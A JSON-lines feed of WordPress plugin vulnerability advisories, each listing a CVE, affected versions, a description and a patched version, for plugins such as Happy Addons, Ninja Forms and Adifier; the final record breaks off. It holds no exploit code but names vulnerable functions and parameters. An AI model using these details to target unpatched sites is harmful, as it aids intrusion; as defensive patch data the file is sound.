{"CVE_ID":"CVE-2024-6556","slug":"smartcrawl-seo","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.10.8. This is due the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d357096-25da-4cbf-9c6c-261bf1b29a9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d357096-25da-4cbf-9c6c-261bf1b29a9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115079%40smartcrawl-seo&new=3115079%40smartcrawl-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115079%40smartcrawl-seo&new=3115079%40smartcrawl-seo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4865","slug":"happy-elementor-addons","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdf2020-ad80-44c3-89b6-fc2ba067cd33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdf2020-ad80-44c3-89b6-fc2ba067cd33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L359\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L359\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5088","slug":"happy-elementor-addons","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/203ab09f-7344-4cab-86bf-0c1ec545d78f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/203ab09f-7344-4cab-86bf-0c1ec545d78f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L360\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php#L360\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087575\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/skills\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0324","slug":"profile-builder","versionImpact":"3.10.8","versionEndExcluding":"3.10.9","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.","recommendation":"Update to version 3.10.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/profile-builder\\\/blob\\\/main\\\/profile-builder\\\/admin\\\/admin-functions.php#L517\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/profile-builder\\\/blob\\\/main\\\/profile-builder\\\/admin\\\/admin-functions.php#L517\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022354\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022354\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4391","slug":"happy-elementor-addons","versionImpact":"3.10.7","versionEndExcluding":"3.10.8","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Event Calendar widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75f7e1a-f3bb-4b24-bf04-b83d0e572551?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e75f7e1a-f3bb-4b24-bf04-b83d0e572551?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php#L1811\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php#L1811\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/event-calendar\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6504","slug":"profile-builder","versionImpact":"3.10.6","versionEndExcluding":"3.10.8","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the wppb_toolbox_usermeta_handler function in all versions up to, and including, 3.10.7. This makes it possible for authenticated attackers, with contributor-level access and above, to expose sensitive information within user metadata.","recommendation":"Update to version 3.10.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f515ccf8-7231-4728-b155-c47049087d42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f515ccf8-7231-4728-b155-c47049087d42?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012472\\\/profile-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012472\\\/profile-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3891","slug":"happy-elementor-addons","versionImpact":"3.10.5","versionEndExcluding":"3.10.6","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML tags in widgets in all versions up to, and including, 3.10.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ade7f391-3824-4d0b-8718-f7995170a43d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ade7f391-3824-4d0b-8718-f7995170a43d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3724","slug":"happy-elementor-addons","versionImpact":"3.10.4","versionEndExcluding":"3.10.5","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Stack Group, Photo Stack, & Horizontal Timeline widgets in all versions up to, and including, 3.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826483d7-948d-46c4-890c-71001b03847c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826483d7-948d-46c4-890c-71001b03847c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/photo-stack\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/photo-stack\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-stack-group\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-stack-group\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/horizontal-timeline\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072960\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/horizontal-timeline\\\/widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6626","slug":"shortpixel-adaptive-images","versionImpact":"3.10.4","versionEndExcluding":"3.10.5","description":"The ShortPixel Adaptive Images \u2013 WebP, AVIF, CDN, Image Optimization plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the API URL Setting in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.10.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortpixel-adaptive-images\\\/tags\\\/3.10.4\\\/includes\\\/front\\\/vanilla-js-loader.class.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortpixel-adaptive-images\\\/tags\\\/3.10.4\\\/includes\\\/front\\\/vanilla-js-loader.class.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3337681%40shortpixel-adaptive-images&new=3337681%40shortpixel-adaptive-images&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3337681%40shortpixel-adaptive-images&new=3337681%40shortpixel-adaptive-images&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ab6429-4b1b-461a-9fcd-b4be84985118?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56ab6429-4b1b-461a-9fcd-b4be84985118?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12173","slug":"master-slider","versionImpact":"3.10.0","versionEndExcluding":"3.10.5","description":"The Master Slider  WordPress plugin before 3.10.5 does not sanitise and escape some of its settings, which could allow high privilege users such as Editor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f35be0e-0f63-4e33-aa4d-c47b1f1e0595\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0f35be0e-0f63-4e33-aa4d-c47b1f1e0595\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3287","slug":"smartcrawl-seo","versionImpact":"3.10.2","versionEndExcluding":"3.10.3","description":"The SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer plugin for WordPress is vulnerable to unauthorized ld+json description injection due to a missing capability check on the save_settings function in all versions up to, and including, 3.10.2. This makes it possible for unauthenticated attackers to save schema types.","recommendation":"Update to version 3.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a77672b-340e-4f10-abe7-461c2db537b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a77672b-340e-4f10-abe7-461c2db537b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073136\\\/smartcrawl-seo\\\/trunk\\\/includes\\\/core\\\/schema\\\/class-types.php?old=2943058&old_path=smartcrawl-seo%2Ftrunk%2Fincludes%2Fcore%2Fschema%2Fclass-types.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073136\\\/smartcrawl-seo\\\/trunk\\\/includes\\\/core\\\/schema\\\/class-types.php?old=2943058&old_path=smartcrawl-seo%2Ftrunk%2Fincludes%2Fcore%2Fschema%2Fclass-types.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5398","slug":"ninja-forms","versionImpact":"3.10.2.1","versionEndExcluding":"3.10.2.2","description":"The Ninja Forms \u2013 The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of a templating engine in all versions up to, and including, 3.10.2.1 due to insufficient output escaping on user data passed through the template. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.10.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/min\\\/front-end.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-forms\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/min\\\/front-end.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3317181%40ninja-forms&new=3317181%40ninja-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3317181%40ninja-forms&new=3317181%40ninja-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92d106c6-a910-4f41-94d1-59f6b7f3aeb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92d106c6-a910-4f41-94d1-59f6b7f3aeb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2203","slug":"funnel-builder","versionImpact":"3.10.1","versionEndExcluding":"3.10.2","description":"The FunnelKit  WordPress plugin before 3.10.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d553cff4-074a-44e7-aebe-e61c86ab8042\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d553cff4-074a-44e7-aebe-e61c86ab8042\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0438","slug":"happy-elementor-addons","versionEndExcluding":"3.10.2","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/267641fe-7490-4b8f-bb39-9531eefa2c30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/extensions\\\/wrapper-link.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/extensions\\\/wrapper-link.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/happy-addons.js#L991\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/assets\\\/js\\\/happy-addons.js#L991\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2561","slug":"ninja-forms","versionImpact":"3.10.0","versionEndExcluding":"3.10.1","description":"The Ninja Forms  WordPress plugin before 3.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a2074a3-a479-4473-92fb-04397f20dd86\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a2074a3-a479-4473-92fb-04397f20dd86\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2560","slug":"ninja-forms","versionImpact":"3.10.0","versionEndExcluding":"3.10.1","description":"The Ninja Forms  WordPress plugin before 3.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adaa55a-4a6d-40ca-ae19-fcb82420894a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2adaa55a-4a6d-40ca-ae19-fcb82420894a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2524","slug":"ninja-forms","versionImpact":"3.10.0","versionEndExcluding":"3.10.1","description":"The Ninja Forms  WordPress plugin before 3.10.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e89ad2b-f12e-4b49-b34e-8da7d30629cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e89ad2b-f12e-4b49-b34e-8da7d30629cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4655","slug":"ultimate-blocks","versionImpact":"3.1.7","versionEndExcluding":"3.1.9","description":"The Ultimate Blocks  WordPress plugin before 3.1.9 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0dc73b3-3c51-4d03-963f-00fa7d8b0d51\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0dc73b3-3c51-4d03-963f-00fa7d8b0d51\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8477","slug":"mailin","versionImpact":"3.1.87","versionEndExcluding":"3.1.88","description":"The Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.87. This is due to missing or incorrect nonce validation on the Init() function. This makes it possible for unauthenticated attackers to log out of a Brevo connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.88, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e070b422-9036-4362-832b-43fd4838f394?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e070b422-9036-4362-832b-43fd4838f394?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165451\\\/mailin\\\/tags\\\/3.1.88\\\/page\\\/page-home.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165451\\\/mailin\\\/tags\\\/3.1.88\\\/page\\\/page-home.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3964","slug":"product-enquiry-for-woocommerce","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Product Enquiry for WooCommerce WordPress plugin before 3.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff468772-3e6a-439c-a4d7-94bd2ce1a964\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff468772-3e6a-439c-a4d7-94bd2ce1a964\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13375","slug":"adifier-system","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Adifier System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.1.7. This is due to the plugin not properly validating a user's identity prior to updating their details like password through the adifier_recover() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/adifier-classified-ads-wordpress-theme\\\/21633950\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/adifier-classified-ads-wordpress-theme\\\/21633950\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf2aeed-0f18-4ef6-aff8-9e8c4531d789?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf2aeed-0f18-4ef6-aff8-9e8c4531d789?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13774","slug":"wish-list-for-woocommerce","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Wishlist for WooCommerce: Multi Wishlists Per Customer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.7. This is due to missing or incorrect nonce validation on the 'save_to_multiple_wishlist' function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L337\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L789\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L789\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11456bb-dde3-4ab8-b00b-a6cdcc68a760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11456bb-dde3-4ab8-b00b-a6cdcc68a760?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7888","slug":"classified-listing","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Classified Listing \u2013 Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions like export_forms(), import_forms(), update_fb_options(), and many more in all versions up to, and including, 3.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify forms and various other settings.","recommendation":"Update to version 3.1.8, or a newer patched 